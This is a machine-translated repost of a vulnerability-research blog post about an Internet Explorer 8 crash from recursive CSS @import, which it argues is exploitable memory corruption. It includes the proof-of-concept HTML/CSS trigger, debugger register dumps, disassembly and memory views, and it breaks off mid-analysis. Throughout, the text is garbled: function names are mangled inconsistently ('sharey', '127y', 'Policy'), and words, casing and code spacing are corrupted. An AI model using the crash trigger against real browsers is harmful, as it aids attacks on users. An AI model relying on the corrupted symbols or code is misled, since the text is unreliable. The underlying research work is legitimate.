Home > Cloud Computing > Cloud Security

When A DoS Isn & amp; #39; t A DoS

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Http://www.breakingpointsystems.com/community/blog/ie-vulnerability/


 Nephi Johnson


It seems that denial-of-service (DoS) attacks are in the news nearly every day, including the recent buzz about a DoS vulnerability present in Internet Explorer 8 thatSurfaced on full-disclosure. Some claimed it was exploitable (suchVUPEN), But most claimed it either wasnt exploitable or that it wocould be very hard to exploit. in this post Im going to show that this particle vulnerability is not a DoS, nor is it impossible to exploit. (** Note: Ill be using IE8 patched upMS10-071On XP SP3)

Understanding the Vuln

The original proof-of-concept code that surfaced on full-disclosure looked something like this:


// Html file
<Div style = "position: absolute; top:-999px; left:-999px;">
<Link href = "css.css" rel = "stylesheet" type = "text/css"/>

// Css file
*{
Color: red;
}
@ Import url ("css.css ");
@ Import url ("css.css ");
@ Import url ("css.css ");
@ Import url ("css.css ");

Loading the html above in IE8 results in a crash:


// Error

(4ec. e8): Access violation-code c0000005 (!!! Second chance !!!)
Eax = 00000000 ebx = 00237160 Ecx= 00730063Edx = 696c413c esi = 00000002 Edi = 0017b484
Eip = 3ced638a esp = 0161dbf8 ebp = 0161dc04 iopl = 0 nv up ei pl nz na po nc
Cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 0038 gs = 0000 efl = 00000202
Mshtml! CSharedStyleSheet: sharey + 0x1d:
3ced638a 83791801 cmp dword ptr [ecx + 18 h], 1 ds: 0023: 0073007b = ????????

// Disassembly around crash

3ced6388 8b0f mov ecx, dword ptr [edi]
3ced638a 83791801 cmp dword ptr [ecx + 18 h], 1 ds: 0023: 0073007b = ????????
3ced638e 0f8442222500 je mshtml! CSharedStyleSheet: 127y + 0x23 (3d1285d6)
3ced6394 4e dec esi
3ced6395 83c704 add edi, 4
3ced6398 eb24 jmp mshtml! CSharedStyleSheet: 127y + 0x33 (3ced63be)
3ced639a 85c0 test eax, eax

The first things you might notice are that ecx has the value 00730063 ("cs") and that it comes directly from the name of the css file ("css.css "). youll also note that ecx comes from a dereferenced edi. looking at the memory surrounding edi, you shoshould see something like this:


// Memory: edi

0017b484 63 00 73 00 73 00 00 30 74 23 c. s... 0 t #
0017b48f 00 52 32 9a ea 00 01 0c ff 0e 00. R2 ........
0017b49a 00 00 63 00 73 00 73 00 2e 00 63 .. c. s .. c
0017b4a5 00 73 00 73 00 00 00 00 00. s .......
0017b4b0 56 32 9a ea 00 01 0c ff 0e 00 00 v2 .........
0017b4bb 00 63 00 73 00 73 00 2e 00 63 00. c. s... c.
0017b4c6 73 00 73 00 00 00 00 00 00 5a s... Z
0017b4d1 32 9a ea 00 01 0c ff 0e 00 00 00 2 ..........
0017b4dc 63 00 73 00 73 00 2e 00 63 00 73 c. s... c. s
0017b4e7 00 73 00 00 00 00 00 00 5e 32. s... ^ 2
0017b4f2 9a ea 00 01 0c ff 0e 00 00 00 63 ...... c
0017b4fd 00 73 00 73 00 2e 00 63 00 73 00. s. s. c. s.
0017b508 73 00 00 00 00 00 62 32 9a s... b2.
0017b513 ea 00 01 0c ff 0e 00 00 00 63 00 ...... c.
0017b51e 73 00 73 00 2e 00 63 00 73 00 73 s. s.. c. s. s.

Now that we know slightly more about the vuln, lets open up IE, attach to it, and set a breakpoint on mshtml! CSharedStyleSheet: Policy before we load the proof of concept. stepping through the CSharedStyleSheet: Using Y function, youll see that edi originally points to an array of CStyleSheet objects. youll also notice that esi ends up holding the number 0x5, which is also the number of elements in the array that edi points, as well as the number of style sheet declarations (the link in the html, and the four @ imports in the css ):


// Disassembly of mshtml! CSharedStyleSheet: Policy

Mshtml! CSharedStyleSheet: sharey:
3ced63a5 8bff mov edi, edi
3ced63a7 55 push ebp
3ced63a8 8bec mov ebp, esp
3ced63aa 51 push ecx
3ced63ab 56 push esi
3ced63ac 8bb1d0000000 mov esi, dword ptr [ecx + 0D0h] ; Esi = 0x14
3ced63b2 57 push edi
3ced63b3 8bb9d8000000 mov edi, dword ptr [ecx + 0D8h] ; Pointer to array of CStyleSheet objects
3ced63b9 33c0 xor eax, eax
3ced63bb c1ee02 shr esi, 2 ; Esi = 0x5

// Memory: edi (array of pointers to CStyleSheet objects)

028a9368 00235c98
028a936c 00235680
028a9370 002352c0
028a9374 00235a40
028a9378 00235338

// Memory: poi (edi)-first element in array

00235c983cf76248 mshtml! CStyleSheet: 'vftable
00235c9c 00000002
00235ca0 00000010
00235ca4 00000000
00235ca8 00000000
00235cac 08000000
00235cb0 00000002
00235cb4 00000000
00235cb8 022d7278
00235cbc 00000000
00235cc0 022d5ee0
00235cc4 022d5fa0
00235cc8 00236c48
00235ccc 00000000
00235cd0 00000000

Stepping farther down, we enter a loop that iterates through each of the pointers in the array pointed to by edi. at the start of this loop, esi is tested for zero before a jmp; if esi is zero, then the function returns:


3ced63be 85f6 test esi, esi
3ced63c0 7fc6 jg mshtml! CSharedStyleSheet: 127y + 0x1b (3ced6388)
3ced63c2 5f pop edi
3ced63c3 5e pop esi
3ced63c4 59 pop ecx
3ced63c5 5d pop ebp
3ced63c6 c20400 ret 4

Inside this loop is the instruction at which the PoC triggered a crash. however, with the first iteration of the loop edi is still pointing to a valid CStyleSheet pointer, so nothing crashes. we do learn, however, that [ecx + 18 h] instruction is a flag that either causes IE to branch off and call mshtml! CStyleSheet: Y or merely continue the loop:


3ced6388 8b0f mov ecx, dword ptr [edi]
3ced638a 83791801 cmp dword ptr [ecx + 18 h], 1 ds: 0023: 00235cb0 = 00000002
3ced638e 0f8442222500 je mshtml! CSharedStyleSheet: 127y + 0x23 (3d1285d6)

// If dword ptr [ecx + 18 h] = 1
3d1285d6 8bda-8 mov eax, dword ptr [ebp + 8]
3d1285d9 e8d00001200 call mshtml! CStyleSheet: Notify (3d2518b2)
3d1285de e9b7dddaff jmp mshtml! CSharedStyleSheet: 127y + 0x2b (3ced639a)

// Else, continue the loop
3ced6394 4e dec esi ; Decrement our loop counter
3ced6395 83c704 add edi, 4 ; Increment CStyleSheet array pointer
3ced6398 eb24 jmp mshtml! CSharedStyleSheet: 127y + 0x33 (3ced63be) ; Restart loop

Below is some pseudo-code of what is happening:


For (int I = array-> length; I> 0; I --){
If (array [I]. flag = 0x1 ){
Array [I]. Policy ();
}
}

If you continue stepping through a second iteration of the loop in the mshtml! CSharedStyleSheet: sharey function, youll notice that after the call to mshtml! CStyleSheet: Notify, edi is no longer pointing to an array of CStyleSheet objects, but instead points into the middle of the name of the stylesheet:


BEFORE | AFTER
// Memory: edi| // Memory: edi
|
028a9368-00235c98 | 028a936c 00730063
028a936c 00235680 | 028a9370 002e0073
028a9370 002352c0 | 028a9374 00730063
028a9374 00235a40 | 028a9378 00000073
028a9378 00235338 | 028a937c 002108b0

To get a feel for why this is happening, stepping into mshtml! CStyleSheet: Notify and breaking on each call/return shows that we are reconstructing and initializing a CStyleSheet object:


0: 008> pct
3d1285d9 e8d00001200 call mshtml! CStyleSheet: Notify (3d25

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
t a photos amp laravel amp html escape amp amp events xxx amp sitefinity amp
Related Article
How does personal cloud security guarantee data security?
Model-driven cloud security-automating cloud security with cl...
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More